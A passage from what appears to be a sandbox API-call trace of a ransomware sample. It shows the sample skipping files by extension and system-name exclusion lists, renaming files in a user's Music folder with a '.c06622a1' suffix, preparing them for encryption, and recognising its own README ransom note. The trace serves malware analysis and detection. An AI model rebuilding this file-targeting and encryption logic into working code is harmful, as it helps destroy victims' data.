(_Str1="exe", _Str2="m4a") returned -8 [0150.922] wcslen (_String="exe") returned 0x3 [0150.922] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0150.922] wcslen (_String="hlp") returned 0x3 [0150.922] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0150.922] wcslen (_String="icl") returned 0x3 [0150.922] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0150.922] wcslen (_String="icns") returned 0x4 [0150.922] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0150.922] wcslen (_String="ico") returned 0x3 [0150.922] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0150.922] wcslen (_String="ics") returned 0x3 [0150.922] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0150.922] wcslen (_String="idx") returned 0x3 [0150.922] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0150.922] wcslen (_String="ldf") returned 0x3 [0150.922] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0150.922] wcslen (_String="lnk") returned 0x3 [0150.922] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0150.922] wcslen (_String="mod") returned 0x3 [0150.922] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0150.922] wcslen (_String="mpa") returned 0x3 [0150.922] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0150.922] wcslen (_String="msc") returned 0x3 [0150.923] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0150.923] wcslen (_String="msp") returned 0x3 [0150.923] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0150.923] wcslen (_String="msstyles") returned 0x8 [0150.923] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0150.923] wcslen (_String="msu") returned 0x3 [0150.923] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0150.923] wcslen (_String="nls") returned 0x3 [0150.923] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0150.923] wcslen (_String="nomedia") returned 0x7 [0150.923] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0150.923] wcslen (_String="ocx") returned 0x3 [0150.923] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0150.923] wcslen (_String="prf") returned 0x3 [0150.923] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0150.923] wcslen (_String="ps1") returned 0x3 [0150.923] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0150.923] wcslen (_String="rom") returned 0x3 [0150.923] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0150.923] wcslen (_String="rtp") returned 0x3 [0150.923] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0150.923] wcslen (_String="scr") returned 0x3 [0150.923] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0150.923] wcslen (_String="shs") returned 0x3 [0150.923] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0150.923] wcslen (_String="spl") returned 0x3 [0150.923] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0150.923] wcslen (_String="sys") returned 0x3 [0150.923] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0150.923] wcslen (_String="theme") returned 0x5 [0150.923] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0150.923] wcslen (_String="themepack") returned 0x9 [0150.923] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0150.923] wcslen (_String="wpx") returned 0x3 [0150.923] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0150.923] wcslen (_String="lock") returned 0x4 [0150.923] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0150.923] wcslen (_String="key") returned 0x3 [0150.923] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0150.924] wcslen (_String="hta") returned 0x3 [0150.924] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0150.924] wcslen (_String="msi") returned 0x3 [0150.924] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0150.924] wcslen (_String="pdb") returned 0x3 [0150.924] _wcsicmp (_Str1="sql", _Str2="m4a") returned 6 [0150.924] wcslen (_String="sql") returned 0x3 [0150.924] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0150.924] wcslen (_String="sqlite") returned 0x6 [0150.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0150.924] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0150.924] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0150.924] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned 0x27 [0150.924] wcscpy (in: _Dest=0x44d00c8, _Source="D0sN2boASCy9vEbn.m4a" | out: _Dest="D0sN2boASCy9vEbn.m4a") returned="D0sN2boASCy9vEbn.m4a" [0150.924] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D0sN2boASCy9vEbn.m4a", dwFileAttributes=0x80) returned 1 [0150.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D0sN2boASCy9vEbn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d0sn2boascy9vebn.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x680 [0150.924] SetFilePointerEx (in: hFile=0x680, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.924] ReadFile (in: hFile=0x680, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0150.925] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xb37ea931 [0150.925] RtlComputeCrc32 (PartialCrc=0xa931, Buffer=0x3feb74, Length=0x80) returned 0xc167effd [0150.925] RtlComputeCrc32 (PartialCrc=0xeffd, Buffer=0x3feb74, Length=0x80) returned 0xdf965f78 [0150.925] RtlComputeCrc32 (PartialCrc=0x5f78, Buffer=0x3feb74, Length=0x80) returned 0x694fb527 [0150.925] RtlComputeCrc32 (PartialCrc=0xb527, Buffer=0x3feb74, Length=0x80) returned 0x5efadfcb [0150.925] CloseHandle (hObject=0x680) returned 1 [0150.925] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0150.925] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D0sN2boASCy9vEbn.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D0sN2boASCy9vEbn.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D0sN2boASCy9vEbn.m4a" [0150.925] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D0sN2boASCy9vEbn.m4a") returned 0x3c [0150.925] wcscpy (in: _Dest=0x44e00f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.925] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D0sN2boASCy9vEbn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d0sn2boascy9vebn.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D0sN2boASCy9vEbn.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d0sn2boascy9vebn.m4a.c06622a1"), dwFlags=0x8) returned 1 [0151.079] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D0sN2boASCy9vEbn.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d0sn2boascy9vebn.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x680 [0151.080] CreateIoCompletionPort (FileHandle=0x680, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0151.080] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0151.085] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5deec954 [0151.085] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6c8f2db0 [0151.085] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x123846ff [0151.085] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5a2ac395 [0151.085] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7879eb63 [0151.085] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x72ba933a [0151.085] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xc10d1f0 [0151.085] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x26d13ce2 [0151.088] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0x9b6151b2 [0151.088] RtlComputeCrc32 (PartialCrc=0x51b2, Buffer=0x4700094, Length=0x80) returned 0xfb3ae0c8 [0151.088] RtlComputeCrc32 (PartialCrc=0xe0c8, Buffer=0x4700094, Length=0x80) returned 0x858db433 [0151.088] RtlComputeCrc32 (PartialCrc=0xb433, Buffer=0x4700094, Length=0x80) returned 0x47709d65 [0151.088] RtlComputeCrc32 (PartialCrc=0x9d65, Buffer=0x4700094, Length=0x80) returned 0x94cb60e8 [0151.088] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0151.089] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0151.089] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0151.089] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0151.089] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0151.089] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0151.089] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0151.089] wcslen (_String="autorun.inf") returned 0xb [0151.089] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0151.089] wcslen (_String="boot.ini") returned 0x8 [0151.089] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0151.089] wcslen (_String="bootfont.bin") returned 0xc [0151.089] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0151.089] wcslen (_String="bootsect.bak") returned 0xc [0151.089] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0151.089] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d9632f0, ftCreationTime.dwHighDateTime=0x1d5ddcd, ftLastAccessTime.dwLowDateTime=0xbe2182c0, ftLastAccessTime.dwHighDateTime=0x1d5e23c, ftLastWriteTime.dwLowDateTime=0xbe2182c0, ftLastWriteTime.dwHighDateTime=0x1d5e23c, nFileSizeHigh=0x0, nFileSizeLow=0x1959, dwReserved0=0x0, dwReserved1=0x0, cFileName="R52En4y _3dX.wav", cAlternateFileName="R52EN4~1.WAV")) returned 1 [0151.089] _wcsicmp (_Str1="R52En4y _3dX.wav", _Str2="README.c06622a1.TXT") returned -48 [0151.089] wcsstr (_Str="R52En4y _3dX.wav", _SubStr="README") returned 0x0 [0151.089] _wcsicmp (_Str1="autorun.inf", _Str2="R52En4y _3dX.wav") returned -17 [0151.089] wcslen (_String="autorun.inf") returned 0xb [0151.089] _wcsicmp (_Str1="boot.ini", _Str2="R52En4y _3dX.wav") returned -16 [0151.089] wcslen (_String="boot.ini") returned 0x8 [0151.089] _wcsicmp (_Str1="bootfont.bin", _Str2="R52En4y _3dX.wav") returned -16 [0151.089] wcslen (_String="bootfont.bin") returned 0xc [0151.089] _wcsicmp (_Str1="bootsect.bak", _Str2="R52En4y _3dX.wav") returned -16 [0151.089] wcslen (_String="bootsect.bak") returned 0xc [0151.089] _wcsicmp (_Str1="desktop.ini", _Str2="R52En4y _3dX.wav") returned -14 [0151.089] wcslen (_String="desktop.ini") returned 0xb [0151.089] _wcsicmp (_Str1="iconcache.db", _Str2="R52En4y _3dX.wav") returned -9 [0151.089] wcslen (_String="iconcache.db") returned 0xc [0151.089] _wcsicmp (_Str1="ntldr", _Str2="R52En4y _3dX.wav") returned -4 [0151.089] wcslen (_String="ntldr") returned 0x5 [0151.089] _wcsicmp (_Str1="ntuser.dat", _Str2="R52En4y _3dX.wav") returned -4 [0151.089] wcslen (_String="ntuser.dat") returned 0xa [0151.089] _wcsicmp (_Str1="ntuser.dat.log", _Str2="R52En4y _3dX.wav") returned -4 [0151.089] wcslen (_String="ntuser.dat.log") returned 0xe [0151.090] _wcsicmp (_Str1="ntuser.ini", _Str2="R52En4y _3dX.wav") returned -4 [0151.090] wcslen (_String="ntuser.ini") returned 0xa [0151.090] _wcsicmp (_Str1="thumbs.db", _Str2="R52En4y _3dX.wav") returned 2 [0151.090] wcslen (_String="thumbs.db") returned 0x9 [0151.090] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0151.090] wcslen (_String="386") returned 0x3 [0151.090] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0151.090] wcslen (_String="adv") returned 0x3 [0151.090] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0151.090] wcslen (_String="ani") returned 0x3 [0151.090] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0151.090] wcslen (_String="bat") returned 0x3 [0151.090] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0151.090] wcslen (_String="bin") returned 0x3 [0151.090] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0151.090] wcslen (_String="cab") returned 0x3 [0151.090] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0151.090] wcslen (_String="cmd") returned 0x3 [0151.090] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0151.090] wcslen (_String="com") returned 0x3 [0151.090] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0151.090] wcslen (_String="cpl") returned 0x3 [0151.090] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0151.090] wcslen (_String="cur") returned 0x3 [0151.090] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0151.090] wcslen (_String="deskthemepack") returned 0xd [0151.090] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0151.090] wcslen (_String="diagcab") returned 0x7 [0151.090] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0151.090] wcslen (_String="diagcfg") returned 0x7 [0151.090] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0151.090] wcslen (_String="diagpkg") returned 0x7 [0151.090] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0151.090] wcslen (_String="dll") returned 0x3 [0151.090] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0151.090] wcslen (_String="drv") returned 0x3 [0151.090] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0151.090] wcslen (_String="exe") returned 0x3 [0151.091] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0151.091] wcslen (_String="hlp") returned 0x3 [0151.091] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0151.091] wcslen (_String="icl") returned 0x3 [0151.091] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0151.091] wcslen (_String="icns") returned 0x4 [0151.091] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0151.091] wcslen (_String="ico") returned 0x3 [0151.091] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0151.091] wcslen (_String="ics") returned 0x3 [0151.091] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0151.091] wcslen (_String="idx") returned 0x3 [0151.091] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0151.091] wcslen (_String="ldf") returned 0x3 [0151.091] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0151.091] wcslen (_String="lnk") returned 0x3 [0151.091] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0151.091] wcslen (_String="mod") returned 0x3 [0151.091] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0151.091] wcslen (_String="mpa") returned 0x3 [0151.091] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0151.091] wcslen (_String="msc") returned 0x3 [0151.091] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0151.091] wcslen (_String="msp") returned 0x3 [0151.091] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0151.091] wcslen (_String="msstyles") returned 0x8 [0151.091] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0151.091] wcslen (_String="msu") returned 0x3 [0151.091] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0151.091] wcslen (_String="nls") returned 0x3 [0151.091] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0151.091] wcslen (_String="nomedia") returned 0x7 [0151.091] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0151.091] wcslen (_String="ocx") returned 0x3 [0151.091] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0151.091] wcslen (_String="prf") returned 0x3 [0151.091] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0151.091] wcslen (_String="ps1") returned 0x3 [0151.092] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0151.092] wcslen (_String="rom") returned 0x3 [0151.092] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0151.092] wcslen (_String="rtp") returned 0x3 [0151.092] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0151.092] wcslen (_String="scr") returned 0x3 [0151.092] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0151.092] wcslen (_String="shs") returned 0x3 [0151.092] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0151.092] wcslen (_String="spl") returned 0x3 [0151.092] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0151.092] wcslen (_String="sys") returned 0x3 [0151.092] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0151.092] wcslen (_String="theme") returned 0x5 [0151.092] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0151.092] wcslen (_String="themepack") returned 0x9 [0151.092] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0151.092] wcslen (_String="wpx") returned 0x3 [0151.092] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0151.092] wcslen (_String="lock") returned 0x4 [0151.092] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0151.092] wcslen (_String="key") returned 0x3 [0151.092] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0151.092] wcslen (_String="hta") returned 0x3 [0151.092] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0151.092] wcslen (_String="msi") returned 0x3 [0151.092] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0151.092] wcslen (_String="pdb") returned 0x3 [0151.092] _wcsicmp (_Str1="sql", _Str2="wav") returned -4 [0151.092] wcslen (_String="sql") returned 0x3 [0151.092] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0151.092] wcslen (_String="sqlite") returned 0x6 [0151.092] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0151.093] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0151.093] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0151.093] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned 0x27 [0151.093] wcscpy (in: _Dest=0x44d00c8, _Source="R52En4y _3dX.wav" | out: _Dest="R52En4y _3dX.wav") returned="R52En4y _3dX.wav" [0151.093] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\R52En4y _3dX.wav", dwFileAttributes=0x80) returned 1 [0151.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\R52En4y _3dX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\r52en4y _3dx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0151.104] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.104] ReadFile (in: hFile=0x1a8, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0151.105] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x6d21eef4 [0151.105] RtlComputeCrc32 (PartialCrc=0xeef4, Buffer=0x3feb74, Length=0x80) returned 0x59abfca4 [0151.105] RtlComputeCrc32 (PartialCrc=0xfca4, Buffer=0x3feb74, Length=0x80) returned 0x444072ea [0151.105] RtlComputeCrc32 (PartialCrc=0x72ea, Buffer=0x3feb74, Length=0x80) returned 0x579811c7 [0151.105] RtlComputeCrc32 (PartialCrc=0x11c7, Buffer=0x3feb74, Length=0x80) returned 0xe6b88e0 [0151.106] CloseHandle (hObject=0x1a8) returned 1 [0151.106] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0151.106] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\R52En4y _3dX.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\R52En4y _3dX.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\R52En4y _3dX.wav" [0151.106] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\R52En4y _3dX.wav") returned 0x38 [0151.106] wcscpy (in: _Dest=0x44e00f0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0151.106] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\R52En4y _3dX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\r52en4y _3dx.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\R52En4y _3dX.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\r52en4y _3dx.wav.c06622a1"), dwFlags=0x8) returned 1 [0151.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\R52En4y _3dX.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\r52en4y _3dx.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0151.110] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0151.110] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0151.115] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5ce41ad0 [0151.115] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2d208d07 [0151.115] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6588d0c7 [0151.115] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x268e82a7 [0151.115] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4549b7da [0151.115] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x33b6ce3a [0151.115] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6c9aa5d2 [0151.115] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3142ce1 [0151.119] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0xe9b232ea [0151.119] RtlComputeCrc32 (PartialCrc=0x32ea, Buffer=0x2f30094, Length=0x80) returned 0x2b1f89c [0151.119] RtlComputeCrc32 (PartialCrc=0xf89c, Buffer=0x2f30094, Length=0x80) returned 0x563a6e22 [0151.119] RtlComputeCrc32 (PartialCrc=0x6e22, Buffer=0x2f30094, Length=0x80) returned 0xd6bd1848 [0151.119] RtlComputeCrc32 (PartialCrc=0x1848, Buffer=0x2f30094, Length=0x80) returned 0x3be656a [0151.119] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0151.119] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0151.119] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0151.119] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd84610a0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd84610a0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd84610a0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0151.119] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0151.119] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x92206b50, ftCreationTime.dwHighDateTime=0x1d5ddcd, ftLastAccessTime.dwLowDateTime=0x8a982c40, ftLastAccessTime.dwHighDateTime=0x1d5d974, ftLastWriteTime.dwLowDateTime=0x8a982c40, ftLastWriteTime.dwHighDateTime=0x1d5d974, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="z3-tnC", cAlternateFileName="")) returned 1 [0151.119] _wcsicmp (_Str1="$recycle.bin", _Str2="z3-tnC") returned -86 [0151.119] wcslen (_String="$recycle.bin") returned 0xc [0151.119] _wcsicmp (_Str1="config.msi", _Str2="z3-tnC") returned -23 [0151.119] wcslen (_String="config.msi") returned 0xa [0151.119] _wcsicmp (_Str1="$windows.~bt", _Str2="z3-tnC") returned -86 [0151.119] wcslen (_String="$windows.~bt") returned 0xc [0151.119] _wcsicmp (_Str1="$windows.~ws", _Str2="z3-tnC") returned -86 [0151.119] wcslen (_String="$windows.~ws") returned 0xc [0151.119] _wcsicmp (_Str1="windows", _Str2="z3-tnC") returned -3 [0151.119] wcslen (_String="windows") returned 0x7 [0151.119] _wcsicmp (_Str1="appdata", _Str2="z3-tnC") returned -25 [0151.119] wcslen 